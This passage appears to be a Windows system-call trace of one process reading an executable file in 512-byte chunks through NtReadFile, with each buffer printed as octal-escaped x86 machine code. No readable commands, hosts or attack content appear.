"\275\0TC\0U\350\245"\0\03\333\205\300\17\205\200\0\0\0\213NH;\313ty\213VL\241X\360B\0\277\300\337B\0\3\320W\3\310RQ\377vD\350\205%\0\0\240\300\337B\0:\303tT<"u\17\277\301\337B\0j"W\350\251!\0\0\210\30W\350u&\0\0\215D8\374;\307v&h\340\222@\0P\377\25hp@\0\205\300u\26W\377\25tp@\0\203\370\377t\4\250\20u\6W\350\217!\0\0W\350A!\0\0PU\3504&\0\0U\350\25"\0\0\205\300u\14\377\266\30\1\0\0U\350*&\0\0h@\200\0\0SSj\1jg\3775 \360B\0\377\254r@\0\243\10\350B\0\203~P\377\277\300\347B\0\17\204\211\0\0\0\213\15 \360B\0\243\324\347B\0\215D$\20W\307D$\24_Nb\0\307\5\304\347B\02\36@\0\211\15\320\347B\0\243\344\347B\0\377\25\220q@\0f\205\300\17\204$\1\0\0\215D$\24SPSj0\377\25\214q@\0S\3775 \360B\0\213D$(+D$ SSP\213D$0+D$(P\215D$(\377t$0\377t$0h\0\0\0\200SPh\200\0\0\0\377\25\210q@\0\243\370\265B\0S\350[\335\377\377\205\300t\10j\2X\351\307\0\0\0\350\312\0\0\09\35\300\360B\0\17\205\213\0\0\0j\5\3775\370\265B\0\377\25\30r@\0\21358q@\0\275\320\222@\0U\377\326\205\300u\14Uf\307\5\326\222@\032\377\326\213-\204q@\0\276\304\222@\0WVS\377\325\205\300u\37WVS\210\35\314\222@\0\377\325W\2115\344\347B\0\306\5\314\222@\02\377\25\220q@\0\241\0\350B\0S\203\300ih\373D@\0\17\267\300SP", ) , ) == 0x0
 00753   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "j\5\213\360\350\267\334\377\377\213\306\353+S\350p\31\0\0\205\300t\309\35\354\347B\0\17\205F\377\377\377j\2\350\226\334\377\377\351:\377\377\377j\1\350\212\334\377\3773\300_^][\203\304\24\303\200=\0`C\0\0SUVW\277\377\377\0\0\273\0`C\0t\10S\350\343#\0\0\353\6\377\25\310p@\03\311\2135d\360B\0\205\366tG\213\15(\360B\0\213Id\213\321\17\257\316\367\332\3\15`\360B\0\3\312Nf\213)f3\350#\357f\205\355t\6\205\366u\354\353\33\213Q\2\211\25\0\350B\0\213Q\6\211\25\310\360B\0\215Q\12\211\25\374\347B\0\203=\374\347B\0\0u\22f\201\377\377\377u\7\277\377\3\0\0\353\2303\377\353\224\17\267\1PS\350J#\0\0j\376h \350B\0\350\354#\0\0P\3775\370\265B\0\377\25\14r@\0_^][\303\203\354\20\271\20\1\0\0SU\213l$ V;\351W\17\204s\1\0\0\201\375\10\4\0\0\17\204g\1\0\0\213\$$\203\375Gu\253\300j\23PPPPS\3775\370\265B\0\377\25\250q@\0\203\375\5u\30\213D$,H\367\330\33\300#\305P\3775\370\265B\0\377\25\30r@\0\201\375\15\4\0\0u\32\3775\370\347B\0\377\25\4r@\0\213D$,\243\370\347B\0\351\373\3\0\0\203\375\21u\23j\0j\0S\377\250r@\03\300@\351\12\4\0\0\203\375\20u3\241D\360B\0H9\5\244\222@\0\17\205\310\0\0\0\3775\350\255B\0\377\25\244q@\0\205\300\17\205\264\0\0\0\275\21\1\0\0\307D$,\1\0\0\0\201\375\21\1\0\0\17\205\233\0\0\0\17\267t$,VS\377\25,r@\0\213\35Hr@\0\213\370\205\377t\33j\0j", ) , ) == 0x0
 00754   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\244q@\0\205\300\17\204\220\3\0\03\377G;\367u\3W\353.\203\376\3u\15\203=\244\222@\0\0~:j\377\353\34\203\376\2u1\203=\254\360B\0\0t\25V\350\204\332\377\377\2115\360\255B\0jx\350_\3\0\0\353(j\3\350n\332\377\377\205\300u\35\211=\360\255B\0\353\344\377t$0\377t$0h\21\1\0\0\3775\370\347B\0\377\323\377t$0\377t$0U\350\265\3\0\0\351\30\3\0\0\213D$,\213\$$;\351\243\4\266B\0uM\2135,r@\0j\1S\211\35$\360B\0\377\326j\2S\243\24\272B\0\377\326j\377j\34S\243\350\255B\0\350\16\3\0\0\3775\10\350B\0j\362S\377\25\240q@\0j\4\350\351\331\377\377\243\354\347B\03\300@\243\4\266B\0\213\15\244\222@\03\377\213\361\301\346\6\35@\360B\0;\317|*\203\370\1u\35W\377v\20\350\24\331\377\377\205\300t\203\3009=\354\347B\0\17\224\300\351\201\2\0\09>\17\204w\2\0\0h\13\4\0\0\350\354\2\0\0\241\4\266B\0\1\5\244\222@\0\301\340\6\3\360\241\244\222@\0;\5D\360B\0u\7j\1\350m\331\377\377\203=\354\347B\0\0\17\205\367\1\0\0\241D\360B\09\5\244\222@\0\17\203\346\1\0\0\377v$\213~\24h\0pC\0\350T!\0\0\377v h\31\374\377\377S\350@\2\0\0\377v\34h\33\374\377\377S\3502\2\0\0\377v(h\32\374\377\377S\350$\2\0\0j\3S\377\25,r@\0\203=\254\360B\0\0\213\350t\10f\201\347\375\376\203\317\4\213\307\203\340\10PU\377\25\30r@\0\213\307%\0\1\0\0PU\377\25, ) , ) == 0x0
 00755   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "j\1Wh\364\0\0\0U\213-Hr@\0\377\3259=\254\360B\0t\23Wj\2h\1\4\0\0S\377\325\3775\350\255B\0\353\6\3775\24\272B\0\350\315\1\0\0\275\30\272B\0h \350B\0U\350\202 \0\0\377v\30U\350\177 \0\0\3\305P\350} \0\0US\377\25\14r@\0W\377v\10\350\264\327\377\377\205\300\17\205\276\376\377\3779\6\17\204\266\376\377\377\203~\4\5u\359\5\254\360B\0\17\205\21\1\0\09\5\240\360B\0\17\205\230\376\377\377\351\0\1\0\0\3775\370\347B\0\377\25\4r@\0\2115\364\255B\0\203>\0\17\216\300\0\0\0\213F\4V\3774\205\250\222@\0f\213\6f\3\5\0\350B\0S\17\267\300P\3775 \360B\0\377\25\0r@\0\205\300\243\370\347B\0\17\204\215\0\0\0\377v,j\6P\350\332\0\0\0\215D$\20Ph\372\3\0\0S\377\25,r@\0P\377\25\234q@\0\215D$\20PS\377\25\230q@\03\377j\25WW\377t$ \377t$ W\3775\370\347B\0\377\25\250q@\0W\377v\14\350\340\326\377\377j\10\3775\370\347B\0\377\25\30r@\0h\5\4\0\0\350\306\0\0\0\353 \3775\370\347B\0\377\25\4r@\0\3775\360\255B\0\203%$\360B\0\0S\377\25\224q@\0\203=\30\312B\0\0u\34\203=\370\347B\0\0t\23j\12S\377\25\30r@\0\307\5\30\312B\0\1\0\0\03\300_^][\203\304\20\302\20\0\203|$\4xu\6\377\5\354\347B\0j\0\377t$\10h\10\4\0\0\3775$\360B\0\377\25Hr@\0\302\4\0\377t$\14j\0\350\373\36\0\0P\213D$\14\5\350\3\0\0P\377t$\14\350\362\27\0\0\302\14\0\377t$", ) , ) == 0x0
 00756   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\302\4\0j\1\377t$\10j(\3775$\360B\0\377\25Hr@\0\302\4\0\241\370\347B\0\205\300t\17j\0j\0\377t$\14P\377\25Hr@\0\302\4\0U\213\354\203\354\14\213E\10V\5\315\376\377\377\203\370\5\17\207\216\0\0\0j\353\377u\20\377\25\260q@\0\213\360\205\366t}\366F\24\2\213\6W\213=\254q@\0t\3P\377\327\366F\24\1t\12P\377u\14\377\25Pp@\0\377v\20\377u\14\377\25Lp@\0\213F\4\366F\24\10\211E\370t\6P\377\327\211E\370\366F\24\4_t\12P\377u\14\377\25Tp@\0\366F\24\20t!\213F\10\211E\364\213F\14\205\300t\7P\377\25@p@\0\215E\364P\377\25Dp@\0\211F\14\213F\14\353\23\300^\311\302\14\0U\213\354\213E\10\213\15\354\255B\0\377u\20\3\310Q\377u\14\377\25\270p@\0\377u\14\350\311\35\0\0\213M\24\211\1\1\5\354\255B\03\300]\302\20\0U\213\354\203\354\14\201}\14\20\1\0\0SVW\17\205\15\1\0\0\213]\24\213{0\205\377}\21\213\15\374\347B\0\215\4\275\4\0\0\0+\310\2139\241X\360B\0\377s4\3\370j"\17\276\7\211E\24\213C\24\377u\10\203e\370\0\213\360G\367\326\301\356\5\203\346\1\203\340\1\211}\364\307E\374\343J@\0\13\360\350L\376\377\377\377s8j#\377u\10\350?\376\377\3773\300j\1\205\366\17\224\300\5\12\4\0\0P\377u\10\377\25\274q@\0V\350C\376\377\377h\350\3\0\0\377u\10\377\25,r@\0\213\330S\350@\376\377\377\2135Hr@\0j\0j\1h[\4\0\0S\377\326\241(\360B\0\213@h\205\300}\11\367\330P\377\25\254q@\0Pj\0hC\4\0\0S", ) \17\276\7\211E\24\213C\24\377u\10\203e\370\0\213\360G\367\326\301\356\5\203\346\1\203\340\1\211}\364\307E\374\343J@\0\13\360\350L\376\377\377\377s8j#\377u\10\350?\376\377\3773\300j\1\205\366\17\224\300\5\12\4\0\0P\377u\10\377\25\274q@\0V\350C\376\377\377h\350\3\0\0\377u\10\377\25,r@\0\213\330S\350@\376\377\377\2135Hr@\0j\0j\1h[\4\0\0S\377\326\241(\360B\0\213@h\205\300}\11\367\330P\377\25\254q@\0Pj\0hC\4\0\0S", ) == 0x0
 00757   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\0S\377\326\203%\354\255B\0\0W\350\275\34\0\0Pj\0h5\4\0\0S\377\326\215E\364P\377u\24hI\4\0\0S\377\326\203%\0\266B\0\03\300\351~\1\0\0\201}\14\21\1\0\0\213=,r@\0\213\35Hr@\0uZ\213E\20\301\350\20f\205\300\17\205K\1\0\03\3009\5\0\266B\0\17\205=\1\0\0\213\15\364\255B\0\215q\24\366\6 \17\204+\1\0\0PPh\360\0\0\0h\12\4\0\0\377u\10\377\327P\377\323\213\16\203\340\1\203\341\376P\13\310\211\16\350M\375\377\377\350\26\1\0\0\203}\14N\17\205\347\0\0\0h\350\3\0\0\377u\10\377\327\213M\24\201y\10\13\7\0\0\17\205\210\0\0\0\201y\14\1\2\0\0\2135\270q@\0\213=\264q@\0u^\213Q\30\307E\374\300\337B\0\211U\364\213Q\34\211U\370+U\364\201\372\0\10\0\0s@\215M\364Qj\0hK\4\0\0P\377\323h\2\177\0\0j\0\377\327P\377\326j\1j\0j\0\377u\374h\350\222@\0\377u\10\377\25\q@\0h\0\177\0\0j\0\377\327P\377\326\213M\24\203y\14 u\17h\211\177\0\0j\0\377\327P\377\326\213M\24\201y\10\0\7\0\0uN\201y\14\0\1\0\0uE\203y\20\15u\24j\0j\1h\21\1\0\0\3775$\360B\0\377\323\213M\24\203y\20\33u\16j\0j\0j\20\3775$\360B\0\377\3233\300@\353\36\201}\14\13\4\0\0u\6\377\5\0\266B\0\213M\24Q\377u\20\377u\14\350~\374\377\377_^[\311\302\20\0\203=\254\360B\0\0\241\350\255B\0u\5\241\24\272B\0j\1j\1h\364\0\0\0P\377\25Hr@\0\303U\213\354\201}\14\20\1\0\0V\213u\24u&\377", ) , ) == 0x0
 00758   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\213F<\301\340\12\5\0\0C\0Ph\350\3\0\0\377u\10\350\307\23\0\0V\377u\20\377u\14\350\21\374\377\377^]\302\20\0U\213\354\203\354D\241\364\255B\0SV\211E\344\213p<\213@8\301\346\12\201\306\0\0C\0\201}\14\13\4\0\0W\211E\374\273\373\3\0\0u\15VS\350\204\23\0\0V\350\241\34\0\0\201}\14\20\1\0\0uOV\350\305\25\0\0\205\300t\20V\350\342\25\0\0\205\300u\6V\350D\25\0\0\213}\10VSW\350J\23\0\0\213E\24\377p4j\1W\350+\373\377\377\213E\24\377p0j\24W\350\35\373\377\377SW\377\25,r@\0P\350D\373\377\377\201}\14\21\1\0\0\17\205\273\0\0\0\17\267E\20;\303u\30\213M\20\301\351\20f\201\371\0\3\17\205\25\2\0\0\307E\14\17\4\0\0=\351\3\0\0\17\205\220\0\0\0j\73\300Y\215}\300\377u\374\363\253\213E\10\277\30\272B\0j\0\211E\274\211}\304\307E\320\20Q@\0\211u\324\350\261\31\0\0\211E\310\215E\274P\307E\314A\0\0\0\377\25`q@\0\205\300tLP\350\35\22\0\0\241(\360B\0\213\200\34\1\0\0\205\300t'Pj\0\350|\31\0\0W\277\300\337B\0W\377\25hp@\0\205\300t\16WV\350^\24\0\0P\377\25\214p@\0\377\5\10\272B\0VS\377u\10\350X\22\0\0\201}\14\17\4\0\0t\15\201}\14\5\4\0\0\17\205]\1\0\0\203e\374\0VS\203\317\377\350:\22\0\0V\350\376\24\0\0\205\300u\7\307E\374\1\0\0\0V\276\10\266B\0V\350\0\31\0\0V\350\224\24\0\0\205\300t\3\200 \0h\4\223@\0\377\254q@\0\205\300\273\0\4\0\0t5h\360\222@\0P\377\25, ) , ) == 0x0
 00759   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\360Q\215M\334QV\377\320\205\300t\22\213}\334\213E\340\17\254\307\12\301\350\12\203\377\377u/\215E\340P\215E\370P\215E\354P\215E\364PV\377\25\314p@\0\205\300t\24\213E\364S\17\257E\354\377u\370P\377\25\14q@\0\213\370j\5\350\240\1\0\0;\370\211E\354s\7\307E\374\2\0\0\0\241\374\347B\0\203x\20\0tCj\373V\350_\30\0\0P\377u\354\350\367\0\0\0Ph\377\3\0\0\377u\10\350S\21\0\0\205\377|\22j\374V\350<\30\0\0PW\350\326\0\0\0P\353\5h\34\312B\0S\377u\10\350/\21\0\0\213E\374\205\300\243\304\360B\0u\12j\7\350\374\317\377\377\211E\374\213E\344\205X\24t\4\203e\374\03\3009E\374\17\224\300P\350\20\371\377\3773\3669u\374u\1595\10\272B\0u\5\350\312\374\377\377\2115\10\272B\0\377u\24\377u\20\377u\14\350-\371\377\377_^[\311\302\20\0U\213\354\203}\14\1V\2135Hr@\0u\34\377u\24h\373\3\0\0\350\271\20\0\0\377u\24j\1hf\4\0\0\377u\10\377\326\203}\14\2u-\377u\24\377u\20\377\25dq@\0\205\300t\16j\7\350g\317\377\377\205\300u\3@\353\23\300Pj\0he\4\0\0\377u\10\377\3263\300^]\302\20\0U\213\354\203\354@SV\213u\10Wj\334\201\376\0\4\0\0\260\24[}\62\300j\336\353\14\201\376\0\0\20\0}\5\260\12j\335[\17\276\370\215E\340j\337P\350%\27\0\0P\215E\300SP\350\32\27\0\0P\215\4\266\3\300\213\317\323\370j\12Y\231\367\371\213\317\323\376RVh\24\223@\0\377u\14\350\361\26\0\0\3E\14P\377\25\34r@\0\213E\14\203\304\30_^[\311\302\10", ) , ) == 0x0
 00760   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\03\300\205\322t\25V\366A\10\1t\7\213t$\10\3\4\261\203\301\30Ju\355^\302\4\0U\213\354\203\354\20\377\25\300q@\0\17\277\310\301\350\20\17\277\300\211E\364\215E\360P\211M\360\377u\10\377\25\230q@\0\215E\360Pj\0h\21\21\0\0\377u\10\377\25Hr@\0\212E\370$f\366\330\33\300#E\374\311\302\4\0U\213\354\203\354PSV\2135,r@\0W\213}\10h\371\3\0\0W\377\326h\10\4\0\0W\211E\370\377\326\213\35H\360B\0\2135Hr@\0\211E\374\241(\360B\0\5\224\0\0\0\201}\14\20\1\0\0\211]\360\211E\350\17\205\207\2\0\0\241L\360B\03\333\301\340\2P\211]\344\307E\354\2\0\0\0\211=\200\360B\0\350h\17\0\0jn\243\20\272B\0\3775 \360B\0\377\25\304q@\0\213}\374h\305[@\0j\374W\211E\14\377\250r@\0Sj\6j!j\20j\20\243\14\272B\0\377\254p@\0h\377\0\377\0\243\374\265B\0\377u\14P\377\25,p@\0\3775\374\265B\0j\2h\11\21\0\0W\377\326SSh\34\21\0\0W\377\326\203\370\20}\13Sj\20h\33\21\0\0W\377\326\377u\14\377\25@p@\03\377\213E\350\213\4\270;\303t@\203\377 t\3\211]\354PS\350\\25\0\0PShC\1\0\0\377u\370\377\326WPhQ\1\0\0\211E\14\377u\370\377\326;=\270\360B\0u\16S\377u\14hN\1\0\0\377u\370\377\326G\203\377!|\260\213}\24\213]\354\377t\2370j\25\377u\10\350\13\366\377\377\377t\2374j\26\377u\10\350\375\365\377\3773\3773\3339=L\360B\0\17\216\5\1\0\0\213E\360!}\364\203\300\10\211E\14\213E\14\213@\370", ) , ) == 0x0
 00761   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "]\260\307E\264\2\0\377\377\307E\270\15\0\0\0\211}\334\350\275\24\0\0\211E\310\213E\14\307E\3040\360\0\0\213\0\213\310\203\341\1A\250\20t\3\203\301\3\213\320\203\342\10\301\341\13\13\321\3\322\250\2\211U\300t=\203\340 \203M\270@\13\320\215E\260Pj\0h\0\21\0\0\307E\330\1\0\0\0\377u\374\211U\300\377\326\213\15\20\272B\0\307E\344\1\0\0\0\211\4\271\241\20\272B\0\213\34\270\353L\250\4t$\241\20\272B\0\213M\364\3774\1\377u\374\350T\6\0\0Sj\3h\12\21\0\0\377u\374\377\326\213\330\353$\213\307\301\340\2\211E\364\215E\260Pj\0h\0\21\0\0\377u\374\377\326\213\15\20\272B\0\213U\364\211\4\12\203E\14\30G;=L\360B\0\17\214\15\377\377\377\203}\344\0u\31j\360\377u\374\377\25\260q@\0$\373Pj\360\377u\374\377\250r@\0j\0j\6h\25\1\0\0\377u\374\377\326\203}\354\0u\20j\5\377u\370\377\25\30r@\0\377u\370\353\3\377u\374\350\330\364\377\377\241\274\360B\0\213]\360\367\330\33\300\203\340#\5\17\4\0\0\211E\14\201}\14\27\4\0\0\277\15\21\0\0u9\241\20\272B\0\213M\20\213\4\210\205\300\211E\300\17\204\230\4\0\0\377u\24\307E\274\1\0\0\0j\0\350]\23\0\0\211E\314\215E\274Pj\0W\377u\374\377\326\213]\360\201}\14\30\4\0\0\17\205\205\0\0\0\213E\20\213U\360\215\14@\213\\312\10\213\15\20\272B\0\213\4\201\205\300\211E\300\17\204U\4\0\0j\10\213\313X\307E\310\20\0\0\0\211E\274#\310\215E\274\3\311Pj\0W\211M\304\377u\374\377\326\377u\300\366\303 j\0X\17\225\300@Ph\2\21\0\0\377u\374\377\326\213\303", ) , ) == 0x0
 00762   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\343\1S\377u\300\377u\374\350\6\4\0\0\377u\300\377u\374\350\326\4\0\0\213]\360\203}\14N\270\23\4\0\0t\119E\14\17\205\365\0\0\09E\14\213}\24t\15\201\177\4\10\4\0\0\17\205\340\0\0\0\366\51\360B\0\2\17\205\226\0\0\09E\14t\27\213E\24\203x\10\376\17\205\204\0\0\0\377u\374\350\263\373\377\377\353\16j\0j\11h\12\21\0\0\377u\374\377\326\205\300\211E\300te\215E\274\307E\274\14\0\0\0Pj\0h\14\21\0\0\377u\374\377\326\213E\304\301\350\14\203\370\4}C\203\370\2\213E\340\215\4@\215D\303\10u\7\203 \376j\0\353\5\203\10\1j\1\377u\300\377u\374\350I\3\0\0\377u\300\377u\374\350\31\4\0\0\203e\24\0\307E\20\1\0\0\0\307E\14\17\4\0\0\205\377t9\201\177\10n\376\377\377u\17\377w\j\0h\31\4\0\0\377u\374\377\326\201\177\10j\376\377\377u\30\213G\\203\177\14\2\215\4@\215D\303\10u\5\203\10 \353\3\203 \337\201}\14\0\2\0\0u\16j\0j\0h\0\2\0\0\377u\374\377\326\2732\4\0\09]\14t)\201}\14\21\1\0\0\17\205'\1\0\0f\201}\20\371\3\17\205\240\2\0\0\213E\20\301\350\20f=\1\0\17\205\220\2\0\03\377WWhG\1\0\0\377u\370\377\3269]\14t\11\203\370\377\17\204\357\0\0\0WPhP\1\0\0\377u\370\377\3269]\14\211E\364u\20\241\270\360B\0\211=\274\360B\0\211E\364\353\7\307E\24\1\0\0\0\203}\364\377t\13\213E\350\213M\3649<\210u\7\307E\364 \0\0\0\203}\364 \17\204\223\0\0\0\241L\360B\0\213\15\20\272B\0;\307\211M\14ts\213M\3643\333C\211E\344\323", ) , ) == 0x0
 00763   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\374t\10\203\17\1j\2X\353\3\203'\376\366\7\20t\3\203\300\3\213M\14\213\11\205\311\211M\300t/\301\340\14\211E\304\215E\274Pj\0h\15\21\0\0\307E\274\10\0\0\0\377u\374\307E\310\0\360\0\0\377\326\377u\300\377u\374\350\236\2\0\0\203E\14\4\203\307\30\377M\344u\236j\0j\6h\25\1\0\0\377u\374\377\326\213E\364\307E\14\17\4\0\0\243\270\360B\03\377\201}\14\13\4\0\0u2\241\374\265B\0;\307t\7P\377\250p@\0\241\20\272B\0;\307t\7P\377\25\274p@\0\211=\374\265B\0\211=\20\272B\0\211=\200\360B\0\201}\14\17\4\0\0\17\205;\1\0\09}\20t\7j\10\350\360\307\377\377\366\51\360B\0\1t23\333\203=\270\360B\0 \2135\30r@\0\17\224\303\301\343\3S\377u\374\377\326Sh\376\3\0\0\377u\10\377\25,r@\0P\377\326\351\302\0\0\09}\24\17\205\271\0\0\03\333\211}\344\353\23\377\241\20\272B\0\213M\350\211E\354\241L\360B\09<\231\211E\364tx;\307th\213E\360\215x\4\213E\354\377M\364\213\0\205\300tI\366G\4\6uC\211E\300\215E\274Pj\0h\14\21\0\0\307E\274\10\0\0\0\377u\374\377\326\213E\304\301\350\14\203\370\1t\11\203\370\4t\43\300\353\33\300@3\322\213\313B\323\342#\27\367\332\33\322B;\320u\20\203E\354\4\203\307\30\203}\364\0u\236\377M\364\203}\364\0|\15\377E\344C\203\373 \17\214d\377\377\3773\377\211\35\270\360B\0W\377u\344hN\1\0\0\377u\370\377\326\241\374\347B\09x\20t(j\373h\30\272B\0\350\362\16\0\0Pj\5\350\12\370\377\377P\350\205\367\377\377Ph\377", ) , ) == 0x0
 00764   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "u\24\377u\20\377u\14\350)\360\377\377_^[\311\302\20\0U\213\354\203\3544\203e\374\0\203e\370\0SV\2135Hr@\0W\377u\14\307E\364\1\0\0\0\277\12\21\0\0j\4\353\25\377u\20S\377u\10\350\312\377\377\377\1E\374\377E\370Sj\1W\377u\10\377\326\213\330\205\333u\337\213E\14\307E\314\14\0\0\0\211E\320\215E\314PSh\14\21\0\0\307E\330\0\360\0\0\377u\10\377\326\213E\360\213\15H\360B\0\215\4@\215L\301\10\213\1\250\20t\12j\4\213\370Z\203\347\1\353\6\213U\364\213}\20\213]\374$\276\205\333\211\1u\4\205\377t\31B9]\370u\4\14\1\353\3B\14@\307E\20\1\0\0\0\211\1\213}\20\215E\314Pj\0h\15\21\0\0\377u\10\301\342\14\211U\324\377\326\213\307_^[\311\302\14\0U\213\354\203\354,VW\377u\14\2135Hr@\0\203e\374\0\277\12\21\0\0j\3W\377u\10\377\326\205\300\211E\14\17\204\243\0\0\0SPj\4W\377u\10\377\326\307E\324\14\0\0\0\307E\340\0\360\0\0\353#\211]\330\377\326\213E\334j\3\301\350\14\231Y\367\371\205\322u\2QZ\11U\374Sj\1W\377u\10\377\326\213\330\215E\324Pj\0h\14\21\0\0\377u\10\205\333u\311\213}\14\211}\330\377\326\213E\370\213\15H\360B\0\213U\374[\215\4@\215D\301\10\203 \276\213\10\203\372\2u\5\203\311\1\211\10\203\372\3u\3\203\10@\215E\324Pj\0h\15\21\0\0\377u\10\301\342\14\211U\334\377\326W\377u\10\3500\377\377\377_^\311\302\10\0U\213\354\203\354(\201}\14\2\1\0\0VWu\33\203}\20 \17\205\255\0\0\0h\23\4\0\0\3501\356\377\3773\300\351\265\0\0\0\203\317\377", ) , ) == 0x0
 00765   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\201}\14\0\2\0\0\276\31\4\0\0u?\377u\10\377\25\314q@\0\205\300tr\377u\10\350\374\365\377\377\205\300\211E\334t\36\215E\330\307E\330\4\0\0\0Pj\0h\14\21\0\0\377u\10\377\25Hr@\0\213}\374\211u\14\353\3\213}\249u\14u;9=\274\222@\0t3S\276\0\0C\0\273\30\272B\0VS\211=\274\222@\0\350T\14\0\0WV\350\253\13\0\0j\6\350=\304\377\377SV\350?\14\0\0[\353\3\213}\24W\377u\20\377u\14\377u\10\3775\14\272B\0\377\25\310q@\0_^\311\302\20\0U\213\354\203\3540\241\4\350B\0SVW3\377\211E\370;\307\17\204\265\0\0\0\213\35\300\222@\0\276\370\255B\0\211]\374\203e\374\1u\11\377u\10V\350\361\13\0\0V\350\345\13\0\09}\14\211E\10t\34\377u\14\350\325\13\0\0\3E\10=\0\10\0\0sx\377u\14V\377\25\214p@\0\366\303\4t\15V\3775\350\347B\0\377\25\14r@\0\366\303\2tHWWh\4\20\0\0\211u\344\377u\370\2135Hr@\0\307E\320\1\0\0\0\377\326+E\374\211}\330\367\323\211E\324\215E\320\203\343\1Pf\201\313\6\20WS\377u\370\377\326W\377u\324h\23\20\0\0\377u\370\377\3269}\374t\12\213E\10\200\240\370\255B\0\0_^[\311\302\10\0V\2135H\360B\0W\213=L\360B\0j\0\377\25|r@\0\11\5\320\360B\0\205\377t(\203\306\14O\366F\374\1t\17\377t$\14\3776\350e\302\377\377\205\300u\11\203\306\30\205\377u\343\353\6\377\5\254\360B\0h\4\4\0\0\350F\354\377\377\377\25\200r@\0\241\254\360B\0_^\302\4\0U\213\354\203\354, ) , ) == 0x0
 00766   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\17\205\200\1\0\0\203M\324\377\203M\340\3773\300\215}\344\307E\314\2\0\0\0\211]\320\211]\330\211]\334\253\253\241(\360B\0\213=,r@\0h\3\4\0\0\213H\\213@`\377u\10\211M\14\211E\20\377\327h\356\3\0\0\243\360\347B\0\377u\10\377\327h\370\3\0\0\243\350\347B\0\377u\10\377\327\3775\360\347B\0\243\4\350B\0\211E\374\350\215\353\377\377j\4\350w\363\377\377\243\364\347B\0\215E\354P\211\35\14\350B\0\377u\374\377\25Tr@\0j\25\377\25\354q@\0\213M\364\2135Hr@\0+\310\215E\314PSh\33\20\0\0\211M\324\377u\374\377\326\270\0@\0\0PPh6\20\0\0\377u\374\377\3269]\14|\34\377u\14Sh\1\20\0\0\377u\374\377\326\377u\14Sh&\20\0\0\377u\374\377\3269]\20|\16\377u\20Sh$\20\0\0\377u\374\377\326\213E\24\377p0j\33\377u\10\350\277\352\377\377\366\50\360B\0\3t)S\3775\360\347B\0\377\25\30r@\0\366\50\360B\0\2u\15j\10\377u\374\377\25\30r@\0\353\6\211\35\360\347B\0h\354\3\0\0\377u\10\377\327h\0\00u\213\370Sh\1\4\0\0W\377\326\366\50\360B\0\4\17\204\357\1\0\0\377u\20Sh\11\4\0\0W\377\326\377u\14Sh\1 \0\0W\377\326\351\322\1\0\0\201}\14\5\4\0\0u(\215E\10PSh\354\3\0\0\377u\10\377\25,r@\0Ph\203]@\0SS\377\25\334p@\0P\377\25lp@\0\201}\14\21\1\0\0\213=\30r@\0u\33f\201}\20\3\4u5S\3775\360\347B\0\377\327j\10V\377\327\350\336\355\377\377\201}\14\4\4\0\0uU9\35\354\347B\0t&jx", ) , ) == 0x0
 00767   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\351\377\377\377u\24\377u\20\377u\14\350%\352\377\377_^[\311\302\20\0j\10\3775$\360B\0\377\3279\35\254\360B\0u\16\241\364\255B\0S\377p4\350t\374\377\377j\1\350i\351\377\377\203}\14{u\2769u\20u\271SSh\4\20\0\0V\377\25Hr@\0;\303\211E\10\17\216\365\0\0\0\377\25\350q@\0j\341S\213\370\350b\10\0\0Pj\1SW\377\25\344q@\0\213E\24\203\370\377u\23\215E\354PV\377\25\234q@\0\213M\354\213E\360\353\11\17\277\310\301\350\20\17\277\300SVSPQh\200\1\0\0W\377\25\340q@\03\377G;\307\17\205\232\0\0\0\213u\10\211]\314\307E\330\30\272B\0\307E\334\377\17\0\0\215E\304NPVh-\20\0\0\377u\374\377\25Hr@\0;\363\215|\7\2u\344S\377\25\334q@\0\377\25\330q@\0WjB\377\25\330p@\0P\211E\14\377\25\324p@\0\213\360\215E\304\211u\330PSh-\20\0\0\211}\334\377u\374\377\25Hr@\0V\350\240\7\0\0\3\360f\307\6\15\12FFC;]\10|\322\377u\14\377\25\320p@\0\377u\14j\1\377\25\324q@\0\377\25\320q@\03\300\351\262\376\377\377U\213\354Q\215E\374P\377\25hq@\0\213E\374\205\300t\22\377u\10\213\10P\377Q\24\213E\374P\213\10\377Q\10\311\302\4\0U\213\354\203\354\20\377u\14\307\5 